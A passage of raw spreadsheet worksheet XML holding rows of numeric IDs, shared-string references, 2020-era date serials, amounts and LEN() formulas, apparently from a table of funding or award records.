      </c>
      <c r="K141">
        <f>LEN(I141)</f>
        <v>35</v>
      </c>
      <c r="L141">
        <f>LEN(J141)</f>
        <v>96</v>
      </c>
    </row>
    <row r="142" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A142">
        <v>16875</v>
      </c>
      <c r="B142">
        <v>452</v>
      </c>
      <c r="C142" t="s">
        <v>128</v>
      </c>
      <c r="D142" t="s">
        <v>9539</v>
      </c>
      <c r="E142">
        <v>11</v>
      </c>
      <c r="F142" t="s">
        <v>132</v>
      </c>
      <c r="G142" s="1">
        <v>43927</v>
      </c>
      <c r="H142">
        <v>1000000</v>
      </c>
      <c r="I142" t="s">
        <v>9540</v>
      </c>
      <c r="J142" t="s">
        <v>9541</v>
      </c>
      <c r="K142">
        <f>LEN(I142)</f>
        <v>45</v>
      </c>
      <c r="L142">
        <f>LEN(J142)</f>
        <v>95</v>
      </c>
    </row>
    <row r="143" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A143">
        <v>19969</v>
      </c>
      <c r="B143">
        <v>1337</v>
      </c>
      <c r="C143" t="s">
        <v>16291</v>
      </c>
      <c r="D143" t="s">
        <v>16292</v>
      </c>
      <c r="E143">
        <v>17</v>
      </c>
      <c r="F143" t="s">
        <v>10361</v>
      </c>
      <c r="G143" s="1">
        <v>43896</v>
      </c>
      <c r="H143" s="4">
        <v>350000</v>
      </c>
      <c r="I143" t="s">
        <v>10362</v>
      </c>
      <c r="J143" t="s">
        <v>10360</v>
      </c>
      <c r="K143">
        <f>LEN(I143)</f>
        <v>51</v>
      </c>
      <c r="L143">
        <f>LEN(J143)</f>
        <v>94</v>
      </c>
    </row>
    <row r="144" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A144">
        <v>19968</v>
      </c>
      <c r="B144">
        <v>1337</v>
      </c>
      <c r="C144" t="s">
        <v>16291</v>
      </c>
      <c r="D144" t="s">
        <v>16292</v>
      </c>
      <c r="E144">
        <v>17</v>
      </c>
      <c r="F144" t="s">
        <v>9561</v>
      </c>
      <c r="G144" s="1">
        <v>43896</v>
      </c>
      <c r="H144" s="4">
        <v>250000</v>
      </c>
      <c r="I144" t="s">
        <v>10358</v>
      </c>
      <c r="J144" t="s">
        <v>10360</v>
      </c>
      <c r="K144">
        <f>LEN(I144)</f>
        <v>31</v>
      </c>
      <c r="L144">
        <f>LEN(J144)</f>
        <v>94</v>
      </c>
    </row>
    <row r="145" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A145">
        <v>20690</v>
      </c>
      <c r="B145">
        <v>2781</v>
      </c>
      <c r="C145" t="s">
        <v>6977</v>
      </c>
      <c r="D145" t="s">
        <v>10891</v>
      </c>
      <c r="E145">
        <v>16</v>
      </c>
      <c r="F145" t="s">
        <v>609</v>
      </c>
      <c r="G145" s="1">
        <v>43986</v>
      </c>
      <c r="H145">
        <v>2000000</v>
      </c>
      <c r="I145" t="s">
        <v>10892</v>
      </c>
      <c r="J145" t="s">
        <v>10893</v>
      </c>
      <c r="K145">
        <f>LEN(I145)</f>
        <v>130</v>
      </c>
      <c r="L145">
        <f>LEN(J145)</f>
        <v>93</v>
      </c>
    </row>
    <row r="146" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A146">
        <v>20638</v>
      </c>
      <c r="B146">
        <v>520</v>
      </c>
      <c r="C146" t="s">
        <v>1123</v>
      </c>
      <c r="D146" t="s">
        <v>10863</v>
      </c>
      <c r="E146">
        <v>16</v>
      </c>
      <c r="F146" t="s">
        <v>10866</v>
      </c>
      <c r="G146" s="1">
        <v>43980</v>
      </c>
      <c r="H146">
        <v>150000</v>
      </c>
      <c r="I146" t="s">
        <v>10867</v>
      </c>
      <c r="J146" t="s">
        <v>10868</v>
      </c>
      <c r="K146">
        <f>LEN(I146)</f>
        <v>54</v>
      </c>
      <c r="L146">
        <f>LEN(J146)</f>
        <v>93</v>
      </c>
    </row>
    <row r="147" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A147">
        <v>20833</v>
      </c>
      <c r="B147">
        <v>2615</v>
      </c>
      <c r="C147" t="s">
        <v>5527</v>
      </c>
      <c r="D147" t="s">
        <v>10464</v>
      </c>
      <c r="E147">
        <v>18</v>
      </c>
      <c r="F147" t="s">
        <v>9523</v>
      </c>
      <c r="G147" s="1">
        <v>44006</v>
      </c>
      <c r="H147">
        <v>2000</v>
      </c>
      <c r="I147" t="s">
        <v>10892</v>
      </c>
      <c r="J147" t="s">
        <v>11019</v>
      </c>
      <c r="K147">
        <f>LEN(I147)</f>
        <v>130</v>
      </c>
      <c r="L147">
        <f>LEN(J147)</f>
        <v>92</v>
      </c>
    </row>
    <row r="148" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A148">
        <v>21153</v>
      </c>
      <c r="B148">
        <v>2719</v>
      </c>
      <c r="C148" t="s">
        <v>6860</v>
      </c>
      <c r="D148" t="s">
        <v>10823</v>
      </c>
      <c r="E148">
        <v>13</v>
      </c>
      <c r="F148" t="s">
        <v>385</v>
      </c>
      <c r="G148" s="1">
        <v>44007</v>
      </c>
      <c r="H148">
        <v>1194066</v>
      </c>
      <c r="J148" t="s">
        <v>11177</v>
      </c>
      <c r="K148">
        <f>LEN(I148)</f>
        <v>0</v>
      </c>
      <c r="L148">
        <f>LEN(J148)</f>
        <v>92</v>
      </c>
    </row>
    <row r="149" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A149">
        <v>17161</v>
      </c>
      <c r="B149">
        <v>2255</v>
      </c>
      <c r="C149" t="s">
        <v>4868</v>
      </c>
      <c r="D149" t="s">
        <v>9685</v>
      </c>
      <c r="E149">
        <v>16</v>
      </c>
      <c r="F149" t="s">
        <v>9700</v>
      </c>
      <c r="G149" s="1">
        <v>44034</v>
      </c>
      <c r="H149">
        <v>100000</v>
      </c>
      <c r="I149" t="s">
        <v>9696</v>
      </c>
      <c r="J149" t="s">
        <v>9701</v>
      </c>
      <c r="K149">
        <f>LEN(I149)</f>
        <v>69</v>
      </c>
      <c r="L149">
        <f>LEN(J149)</f>
        <v>91</v>
      </c>
    </row>
    <row r="150" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A150">
        <v>20331</v>
      </c>
      <c r="B150">
        <v>235</v>
      </c>
      <c r="C150" t="s">
        <v>486</v>
      </c>
      <c r="D150" t="s">
        <v>10198</v>
      </c>
      <c r="E150">
        <v>16</v>
      </c>
      <c r="F150" t="s">
        <v>9437</v>
      </c>
      <c r="G150" s="1">
        <v>43937</v>
      </c>
      <c r="H150">
        <v>1331000</v>
      </c>
      <c r="J150" t="s">
        <v>10635</v>
      </c>
      <c r="K150">
        <f>LEN(I150)</f>
        <v>0</v>
      </c>
      <c r="L150">
        <f>LEN(J150)</f>
        <v>91</v>
      </c>
    </row>
    <row r="151" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A151">
        <v>20332</v>
      </c>
      <c r="B151">
        <v>235</v>
      </c>
      <c r="C151" t="s">
        <v>486</v>
      </c>
      <c r="D151" t="s">
        <v>10198</v>
      </c>
      <c r="E151">
        <v>16</v>
      </c>
      <c r="F151" t="s">
        <v>2236</v>
      </c>
      <c r="G151" s="1">
        <v>43937</v>
      </c>
      <c r="H151">
        <v>1331000</v>
      </c>
      <c r="J151" t="s">
        <v>10635</v>
      </c>
      <c r="K151">
        <f>LEN(I151)</f>
        <v>0</v>
      </c>
      <c r="L151">
        <f>LEN(J151)</f>
        <v>91</v>
      </c>
    </row>
    <row r="152" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A152">
        <v>20333</v>
      </c>
      <c r="B152">
        <v>235</v>
      </c>
      <c r="C152" t="s">
        <v>486</v>
      </c>
      <c r="D152" t="s">
        <v>10198</v>
      </c>
      <c r="E152">
        <v>16</v>
      </c>
      <c r="F152" t="s">
        <v>10250</v>
      </c>
      <c r="G152" s="1">
        <v>43937</v>
      </c>
      <c r="H152">
        <v>1331000</v>
      </c>
      <c r="J152" t="s">
        <v>10635</v>
      </c>
      <c r="K152">
        <f>LEN(I152)</f>
        <v>0</v>
      </c>
      <c r="L152">
        <f>LEN(J152)</f>
        <v>91</v>
      </c>
    </row>
    <row r="153" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A153">
        <v>20334</v>
      </c>
      <c r="B153">
        <v>235</v>
      </c>
      <c r="C153" t="s">
        <v>486</v>
      </c>
      <c r="D153" t="s">
        <v>10198</v>
      </c>
      <c r="E153">
        <v>16</v>
      </c>
      <c r="F153" t="s">
        <v>10636</v>
      </c>
      <c r="G153" s="1">
        <v>43937</v>
      </c>
      <c r="H153">
        <v>1331000</v>
      </c>
      <c r="J153" t="s">
        <v>10635</v>
      </c>
      <c r="K153">
        <f>LEN(I153)</f>
        <v>0</v>
      </c>
      <c r="L153">
        <f>LEN(J153)</f>
        <v>91</v>
      </c>
    </row>
    <row r="154" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A154">
        <v>20335</v>
      </c>
      <c r="B154">
        <v>235</v>
      </c>
      <c r="C154" t="s">
        <v>486</v>
      </c>
      <c r="D154" t="s">
        <v>10198</v>
      </c>
      <c r="E154">
        <v>16</v>
      </c>
      <c r="F154" t="s">
        <v>10637</v>
      </c>
      <c r="G154" s="1">
        <v>43937</v>
      </c>
      <c r="H154">
        <v>1331000</v>
      </c>
      <c r="J154" t="s">
        <v>10635</v>
      </c>
      <c r="K154">
        <f>LEN(I154)</f>
        <v>0</v>
      </c>
      <c r="L154">
        <f>LEN(J154)</f>
        <v>91</v>
      </c>
    </row>
    <row r="155" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A155">
        <v>20338</v>
      </c>
      <c r="B155">
        <v>235</v>
      </c>
      <c r="C155" t="s">
        <v>486</v>
      </c>
      <c r="D155" t="s">
        <v>10198</v>
      </c>
      <c r="E155">
        <v>16</v>
      </c>
      <c r="F155" t="s">
        <v>10639</v>
      </c>
      <c r="G155" s="1">
        <v>43937</v>
      </c>
      <c r="H155">
        <v>1331000</v>
      </c>
      <c r="J155" t="s">
        <v>10635</v>
      </c>
      <c r="K155">
        <f>LEN(I155)</f>
        <v>0</v>
      </c>
      <c r="L155">
        <f>LEN(J155)</f>
        <v>91</v>
      </c>
    </row>
    <row r="156" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A156">
        <v>17155</v>
      </c>
      <c r="B156">
        <v>2255</v>
      </c>
      <c r="C156" t="s">
        <v>4868</v>
      </c>
      <c r="D156" t="s">
        <v>9685</v>
      </c>
      <c r="E156">
        <v>16</v>
      </c>
      <c r="F156" t="s">
        <v>9686</v>
      </c>
      <c r="G156" s="1">
        <v>44034</v>
      </c>
      <c r="H156">
        <v>100000</v>
      </c>
      <c r="I156" t="s">
        <v>9687</v>
      </c>
      <c r="J156" t="s">
        <v>9688</v>
      </c>
      <c r="K156">
        <f>LEN(I156)</f>
        <v>109</v>
      </c>
      <c r="L156">
        <f>LEN(J156)</f>
        <v>89</v>
      </c>
    </row>
    <row r="157" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A157">
        <v>20543</v>
      </c>
      <c r="B157">
        <v>640</v>
      </c>
      <c r="C157" t="s">
        <v>16293</v>
      </c>
      <c r="D157" t="s">
        <v>16294</v>
      </c>
      <c r="E157">
        <v>16</v>
      </c>
      <c r="F157" t="s">
        <v>673</v>
      </c>
      <c r="G157" s="1">
        <v>43969</v>
      </c>
      <c r="H157" s="4">
        <v>150000</v>
      </c>
      <c r="I157" t="s">
        <v>9693</v>
      </c>
      <c r="J157" t="s">
        <v>10045</v>
      </c>
      <c r="K157">
        <f>LEN(I157)</f>
        <v>33</v>
      </c>
      <c r="L157">
        <f>LEN(J157)</f>
        <v>89</v>
      </c>
    </row>
    <row r="158" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A158">
        <v>20544</v>
      </c>
      <c r="B158">
        <v>640</v>
      </c>
      <c r="C158" t="s">
        <v>16293</v>
      </c>
      <c r="D158" t="s">
        <v>16294</v>
      </c>
      <c r="E158">
        <v>16</v>
      </c>
      <c r="F158" t="s">
        <v>10791</v>
      </c>
      <c r="G158" s="1">
        <v>43969</v>
      </c>
      <c r="H158" s="4">
        <v>600000</v>
      </c>
      <c r="I158" t="s">
        <v>9693</v>
      </c>
      <c r="J158" t="s">
        <v>10045</v>
      </c>
      <c r="K158">
        <f>LEN(I158)</f>
        <v>33</v>
      </c>
      <c r="L158">
        <f>LEN(J158)</f>
        <v>89</v>
      </c>
    </row>
    <row r="159" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A159">
        <v>19440</v>
      </c>
      <c r="B159">
        <v>853</v>
      </c>
      <c r="C159" t="s">
        <v>2564</v>
      </c>
      <c r="D159" t="s">
        <v>9875</v>
      </c>
      <c r="E159">
        <v>13</v>
      </c>
      <c r="F159" t="s">
        <v>4686</v>
      </c>
      <c r="G159" s="1">
        <v>43987</v>
      </c>
      <c r="H159">
        <v>12000</v>
      </c>
      <c r="J159" t="s">
        <v>10045</v>
      </c>
      <c r="K159">
        <f>LEN(I159)</f>
        <v>0</v>
      </c>
      <c r="L159">
        <f>LEN(J159)</f>
        <v>89</v>
      </c>
    </row>
    <row r="160" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A160">
        <v>20194</v>
      </c>
      <c r="B160">
        <v>237</v>
      </c>
      <c r="C160" t="s">
        <v>798</v>
      </c>
      <c r="D160" t="s">
        <v>10537</v>
      </c>
      <c r="E160">
        <v>16</v>
      </c>
      <c r="F160" t="s">
        <v>10538</v>
      </c>
      <c r="G160" s="1">
        <v>43921</v>
      </c>
      <c r="H160">
        <v>750000</v>
      </c>
      <c r="J160" t="s">
        <v>10539</v>
      </c>
      <c r="K160">
        <f>LEN(I160)</f>
        <v>0</v>
      </c>
      <c r="L160">
        <f>LEN(J160)</f>
        <v>89</v>
      </c>
    </row>
    <row r="161" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A161">
        <v>20256</v>
      </c>
      <c r="B161">
        <v>596</v>
      </c>
      <c r="C161" t="s">
        <v>835</v>
      </c>
      <c r="D161" t="s">
        <v>10583</v>
      </c>
      <c r="E161">
        <v>12</v>
      </c>
      <c r="F161" t="s">
        <v>9437</v>
      </c>
      <c r="G161" s="1">
        <v>43959</v>
      </c>
      <c r="H161">
        <v>250000</v>
      </c>
      <c r="J161" t="s">
        <v>10045</v>
      </c>
      <c r="K161">
        <f>LEN(I161)</f>
        <v>0</v>
      </c>
      <c r="L161">
        <f>LEN(J161)</f>
        <v>89</v>
      </c>
    </row>
    <row r="162" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A162">
        <v>21145</v>
      </c>
      <c r="B162">
        <v>2579</v>
      </c>
      <c r="C162" t="s">
        <v>5115</v>
      </c>
      <c r="D162" t="s">
        <v>10038</v>
      </c>
      <c r="E162">
        <v>12</v>
      </c>
      <c r="F162" t="s">
        <v>609</v>
      </c>
      <c r="G162" s="1">
        <v>44106</v>
      </c>
      <c r="H162">
        <v>10000</v>
      </c>
      <c r="J162" t="s">
        <v>10045</v>
      </c>
      <c r="K162">
        <f>LEN(I162)</f>
        <v>0</v>
      </c>
      <c r="L162">
        <f>LEN(J162)</f>
        <v>89</v>
      </c>
    </row>
    <row r="163" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A163">
        <v>21026</v>
      </c>
      <c r="B163">
        <v>667</v>
      </c>
      <c r="C163" t="s">
        <v>1296</v>
      </c>
      <c r="D163" t="s">
        <v>11104</v>
      </c>
      <c r="E163">
        <v>11</v>
      </c>
      <c r="F163" t="s">
        <v>9458</v>
      </c>
      <c r="G163" s="1">
        <v>44095</v>
      </c>
      <c r="H163">
        <v>10000</v>
      </c>
      <c r="J163" t="s">
        <v>11105</v>
      </c>
      <c r="K163">
        <f>LEN(I163)</f>
        <v>0</v>
      </c>
      <c r="L163">
        <f>LEN(J163)</f>
        <v>88</v>
      </c>
    </row>
    <row r="164" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A164">
        <v>21027</v>
      </c>
      <c r="B164">
        <v>667</v>
      </c>
      <c r="C164" t="s">
        <v>1296</v>
      </c>
      <c r="D164" t="s">
        <v>11104</v>
      </c>
      <c r="E164">
        <v>11</v>
      </c>
      <c r="F164" t="s">
        <v>9838</v>
      </c>
      <c r="G164" s="1">
        <v>44095</v>
      </c>
      <c r="H164">
        <v>10000</v>
      </c>
      <c r="J164" t="s">
        <v>11105</v>
      </c>
      <c r="K164">
        <f>LEN(I164)</f>
        <v>0</v>
      </c>
      <c r="L164">
        <f>LEN(J164)</f>
        <v>88</v>
      </c>
    </row>
    <row r="165" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A165">
        <v>21029</v>
      </c>
      <c r="B165">
        <v>667</v>
      </c>
      <c r="C165" t="s">
        <v>1296</v>
      </c>
      <c r="D165" t="s">
        <v>11104</v>
      </c>
      <c r="E165">
        <v>11</v>
      </c>
      <c r="F165" t="s">
        <v>547</v>
      </c>
      <c r="G165" s="1">
        <v>44095</v>
      </c>
      <c r="H165">
        <v>10000</v>
      </c>
      <c r="J165" t="s">
        <v>11106</v>
      </c>
      <c r="K165">
        <f>LEN(I165)</f>
        <v>0</v>
      </c>
      <c r="L165">
        <f>LEN(J165)</f>
        <v>88</v>
      </c>
    </row>
    <row r="166" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A166">
        <v>20639</v>
      </c>
      <c r="B166">
        <v>520</v>
      </c>
      <c r="C166" t="s">
        <v>1123</v>
      </c>
      <c r="D166" t="s">
        <v>10863</v>
      </c>
      <c r="E166">
        <v>16</v>
      </c>
      <c r="F166" t="s">
        <v>10869</v>
      </c>
      <c r="G166" s="1">
        <v>43980</v>
      </c>
      <c r="H166">
        <v>250000</v>
      </c>
      <c r="I166" t="s">
        <v>10870</v>
      </c>
      <c r="J166" t="s">
        <v>10871</v>
      </c>
      <c r="K166">
        <f>LEN(I166)</f>
        <v>135</v>
      </c>
      <c r="L166">
        <f>LEN(J166)</f>
        <v>86</v>
      </c>
    </row>
    <row r="167" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A167">
        <v>20235</v>
      </c>
      <c r="B167">
        <v>27</v>
      </c>
      <c r="C167" t="s">
        <v>598</v>
      </c>
      <c r="D167" t="s">
        <v>10565</v>
      </c>
      <c r="E167">
        <v>17</v>
      </c>
      <c r="F167" t="s">
        <v>10569</v>
      </c>
      <c r="G167" s="1">
        <v>43942</v>
      </c>
      <c r="H167">
        <v>0</v>
      </c>
      <c r="J167" t="s">
        <v>10570</v>
      </c>
      <c r="K167">
        <f>LEN(I167)</f>
        <v>0</v>
      </c>
      <c r="L167">
        <f>LEN(J167)</f>
        <v>86</v>
      </c>
    </row>
    <row r="168" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A168">
        <v>20236</v>
      </c>
      <c r="B168">
        <v>27</v>
      </c>
      <c r="C168" t="s">
        <v>598</v>
      </c>
      <c r="D168" t="s">
        <v>10565</v>
      </c>
      <c r="E168">
        <v>17</v>
      </c>
      <c r="F168" t="s">
        <v>10571</v>
      </c>
      <c r="G168" s="1">
        <v>43942</v>
      </c>
      <c r="H168">
        <v>0</v>
      </c>
      <c r="J168" t="s">
        <v>10570</v>
      </c>
      <c r="K168">
        <f>LEN(I168)</f>
        <v>0</v>
      </c>
      <c r="L168">
        <f>LEN(J168)</f>
        <v>86</v>
      </c>
    </row>
    <row r="169" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A169">
        <v>20237</v>
      </c>
      <c r="B169">
        <v>27</v>
      </c>
      <c r="C169" t="s">
        <v>598</v>
      </c>
      <c r="D169" t="s">
        <v>10565</v>
      </c>
      <c r="E169">
        <v>17</v>
      </c>
      <c r="F169" t="s">
        <v>2236</v>
      </c>
      <c r="G169" s="1">
        <v>43942</v>
      </c>
      <c r="H169">
        <v>0</v>
      </c>
      <c r="J169" t="s">
        <v>10570</v>
      </c>
      <c r="K169">
        <f>LEN(I169)</f>
        <v>0</v>
      </c>
      <c r="L169">
        <f>LEN(J169)</f>
        <v>86</v>
      </c>
    </row>
    <row r="170" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A170">
        <v>20238</v>
      </c>
      <c r="B170">
        <v>27</v>
      </c>
      <c r="C170" t="s">
        <v>598</v>
      </c>
      <c r="D170" t="s">
        <v>10572</v>
      </c>
      <c r="E170">
        <v>17</v>
      </c>
      <c r="F170" t="s">
        <v>9610</v>
      </c>
      <c r="G170" s="1">
        <v>43942</v>
      </c>
      <c r="H170">
        <v>30000</v>
      </c>
      <c r="J170" t="s">
        <v>10570</v>
      </c>
      <c r="K170">
        <f>LEN(I170)</f>
        <v>0</v>
      </c>
      <c r="L170">
        <f>LEN(J170)</f>
        <v>86</v>
      </c>
    </row>
    <row r="171" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A171">
        <v>20239</v>
      </c>
      <c r="B171">
        <v>27</v>
      </c>
      <c r="C171" t="s">
        <v>598</v>
      </c>
      <c r="D171" t="s">
        <v>10565</v>
      </c>
      <c r="E171">
        <v>17</v>
      </c>
      <c r="F171" t="s">
        <v>10573</v>
      </c>
      <c r="G171" s="1">
        <v>43942</v>
      </c>
      <c r="H171">
        <v>40000</v>
      </c>
      <c r="J171" t="s">
        <v>10570</v>
      </c>
      <c r="K171">
        <f>LEN(I171)</f>
        <v>0</v>
      </c>
      <c r="L171">
        <f>LEN(J171)</f>
        <v>86</v>
      </c>
    </row>
    <row r="172" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A172">
        <v>20999</v>
      </c>
      <c r="B172">
        <v>1381</v>
      </c>
      <c r="C172" t="s">
        <v>2504</v>
      </c>
      <c r="D172" t="s">
        <v>9549</v>
      </c>
      <c r="E172">
        <v>11</v>
      </c>
      <c r="F172" t="s">
        <v>9674</v>
      </c>
      <c r="G172" s="1">
        <v>44014</v>
      </c>
      <c r="H172">
        <v>500</v>
      </c>
      <c r="J172" t="s">
        <v>11095</v>
      </c>
      <c r="K172">
        <f>LEN(I172)</f>
        <v>0</v>
      </c>
      <c r="L172">
        <f>LEN(J172)</f>
        <v>86</v>
      </c>
    </row>
    <row r="173" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A173">
        <v>17159</v>
      </c>
      <c r="B173">
        <v>2255</v>
      </c>
      <c r="C173" t="s">
        <v>4868</v>
      </c>
      <c r="D173" t="s">
        <v>9685</v>
      </c>
      <c r="E173">
        <v>16</v>
      </c>
      <c r="F173" t="s">
        <v>9695</v>
      </c>
      <c r="G173" s="1">
        <v>44034</v>
      </c>
      <c r="H173">
        <v>100000</v>
      </c>
      <c r="I173" t="s">
        <v>9696</v>
      </c>
      <c r="J173" t="s">
        <v>9697</v>
      </c>
      <c r="K173">
        <f>LEN(I173)</f>
        <v>69</v>
      </c>
      <c r="L173">
        <f>LEN(J173)</f>
        <v>85</v>
      </c>
    </row>
    <row r="174" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A174">
        <v>21299</v>
      </c>
      <c r="B174">
        <v>2619</v>
      </c>
      <c r="C174" t="s">
        <v>5620</v>
      </c>
      <c r="D174" t="s">
        <v>11277</v>
      </c>
      <c r="E174">
        <v>31</v>
      </c>
      <c r="F174" t="s">
        <v>6917</v>
      </c>
      <c r="G174" s="1">
        <v>44081</v>
      </c>
      <c r="H174">
        <v>60000</v>
      </c>
      <c r="I174" t="s">
        <v>11278</v>
      </c>
      <c r="J174" t="s">
        <v>11279</v>
      </c>
      <c r="K174">
        <f>LEN(I174)</f>
        <v>218</v>
      </c>
      <c r="L174">
        <f>LEN(J174)</f>
        <v>84</v>
      </c>
    </row>
    <row r="175" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A175">
        <v>20714</v>
      </c>
      <c r="B175">
        <v>2332</v>
      </c>
      <c r="C175" t="s">
        <v>5974</v>
      </c>
      <c r="D175" t="s">
        <v>9594</v>
      </c>
      <c r="E175">
        <v>13</v>
      </c>
      <c r="F175" t="s">
        <v>1746</v>
      </c>
      <c r="G175" s="1">
        <v>44000</v>
      </c>
      <c r="H175">
        <v>50000</v>
      </c>
      <c r="I175" t="s">
        <v>10917</v>
      </c>
      <c r="J175" t="s">
        <v>10918</v>
      </c>
      <c r="K175">
        <f>LEN(I175)</f>
        <v>89</v>
      </c>
      <c r="L175">
        <f>LEN(J175)</f>
        <v>84</v>
      </c>
    </row>
    <row r="176" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A176">
        <v>21186</v>
      </c>
      <c r="B176">
        <v>80</v>
      </c>
      <c r="C176" t="s">
        <v>1543</v>
      </c>
      <c r="D176" t="s">
        <v>11197</v>
      </c>
      <c r="E176">
        <v>12</v>
      </c>
      <c r="F176" t="s">
        <v>9466</v>
      </c>
      <c r="G176" s="1">
        <v>44116</v>
      </c>
      <c r="H176">
        <v>25500</v>
      </c>
      <c r="I176" t="s">
        <v>9550</v>
      </c>
      <c r="J176" t="s">
        <v>11198</v>
      </c>
      <c r="K176">
        <f>LEN(I176)</f>
        <v>18</v>
      </c>
      <c r="L176">
        <f>LEN(J176)</f>
        <v>84</v>
      </c>
    </row>
    <row r="177" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A177">
        <v>21187</v>
      </c>
      <c r="B177">
        <v>80</v>
      </c>
      <c r="C177" t="s">
        <v>1543</v>
      </c>
      <c r="D177" t="s">
        <v>11197</v>
      </c>
      <c r="E177">
        <v>12</v>
      </c>
      <c r="F177" t="s">
        <v>5434</v>
      </c>
      <c r="G177" s="1">
        <v>44116</v>
      </c>
      <c r="H177">
        <v>21000</v>
      </c>
      <c r="I177" t="s">
        <v>9550</v>
      </c>
      <c r="J177" t="s">
        <v>11198</v>
      </c>
      <c r="K177">
        <f>LEN(I177)</f>
        <v>18</v>
      </c>
      <c r="L177">
        <f>LEN(J177)</f>
        <v>84</v>
      </c>
    </row>
    <row r="178" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A178">
        <v>21188</v>
      </c>
      <c r="B178">
        <v>80</v>
      </c>
      <c r="C178" t="s">
        <v>1543</v>
      </c>
      <c r="D178" t="s">
        <v>11197</v>
      </c>
      <c r="E178">
        <v>12</v>
      </c>
      <c r="F178" t="s">
        <v>9556</v>
      </c>
      <c r="G178" s="1">
        <v>44116</v>
      </c>
      <c r="H178">
        <v>27000</v>
      </c>
      <c r="I178" t="s">
        <v>9550</v>
      </c>
      <c r="J178" t="s">
        <v>11198</v>
      </c>
      <c r="K178">
        <f>LEN(I178)</f>
        <v>18</v>
      </c>
      <c r="L178">
        <f>LEN(J178)</f>
        <v>84</v>
      </c>
    </row>
    <row r="179" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A179">
        <v>21189</v>
      </c>
      <c r="B179">
        <v>80</v>
      </c>
      <c r="C179" t="s">
        <v>1543</v>
      </c>
      <c r="D179" t="s">
        <v>11197</v>
      </c>
      <c r="E179">
        <v>12</v>
      </c>
      <c r="F179" t="s">
        <v>512</v>
      </c>
      <c r="G179" s="1">
        <v>44116</v>
      </c>
      <c r="H179">
        <v>25500</v>
      </c>
      <c r="I179" t="s">
        <v>9550</v>
      </c>
      <c r="J179" t="s">
        <v>11198</v>
      </c>
      <c r="K179">
        <f>LEN(I179)</f>
        <v>18</v>
      </c>
      <c r="L179">
        <f>LEN(J179)</f>
        <v>84</v>
      </c>
    </row>
    <row r="180" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A180">
        <v>21347</v>
      </c>
      <c r="B180">
        <v>49</v>
      </c>
      <c r="C180" t="s">
        <v>1612</v>
      </c>
      <c r="D180" t="s">
        <v>11322</v>
      </c>
      <c r="E180">
        <v>12</v>
      </c>
      <c r="F180" t="s">
        <v>10426</v>
      </c>
      <c r="G180" s="1">
        <v>44067</v>
      </c>
      <c r="H180">
        <v>10000</v>
      </c>
      <c r="J180" t="s">
        <v>11198</v>
      </c>
      <c r="K180">
        <f>LEN(I180)</f>
        <v>0</v>
      </c>
      <c r="L180">
        <f>LEN(J180)</f>
        <v>84</v>
      </c>
    </row>
    <row r="181" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A181">
        <v>19252</v>
      </c>
      <c r="B181">
        <v>2068</v>
      </c>
      <c r="C181" t="s">
        <v>4780</v>
      </c>
      <c r="D181" t="s">
        <v>9856</v>
      </c>
      <c r="E181">
        <v>16</v>
      </c>
      <c r="F181" t="s">
        <v>2236</v>
      </c>
      <c r="G181" s="1">
        <v>43875</v>
      </c>
      <c r="H181">
        <v>6000</v>
      </c>
      <c r="I181" t="s">
        <v>9871</v>
      </c>
      <c r="J181" t="s">
        <v>9872</v>
      </c>
      <c r="K181">
        <f>LEN(I181)</f>
        <v>120</v>
      </c>
      <c r="L181">
        <f>LEN(J181)</f>
        <v>83</v>
      </c>
    </row>
    <row r="182" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A182">
        <v>20117</v>
      </c>
      <c r="B182">
        <v>2615</v>
      </c>
      <c r="C182" t="s">
        <v>5527</v>
      </c>
      <c r="D182" t="s">
        <v>10464</v>
      </c>
      <c r="E182">
        <v>18</v>
      </c>
      <c r="F182" t="s">
        <v>4686</v>
      </c>
      <c r="G182" s="1">
        <v>43944</v>
      </c>
      <c r="H182">
        <v>15000</v>
      </c>
      <c r="I182" t="s">
        <v>10483</v>
      </c>
      <c r="J182" t="s">
        <v>10482</v>
      </c>
      <c r="K182">
        <f>LEN(I182)</f>
        <v>101</v>
      </c>
      <c r="L182">
        <f>LEN(J182)</f>
        <v>83</v>
      </c>
    </row>
    <row r="183" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A183">
        <v>21331</v>
      </c>
      <c r="B183">
        <v>4798</v>
      </c>
      <c r="C183" t="s">
        <v>7183</v>
      </c>
      <c r="D183" t="s">
        <v>11310</v>
      </c>
      <c r="E183">
        <v>11</v>
      </c>
      <c r="F183" t="s">
        <v>11315</v>
      </c>
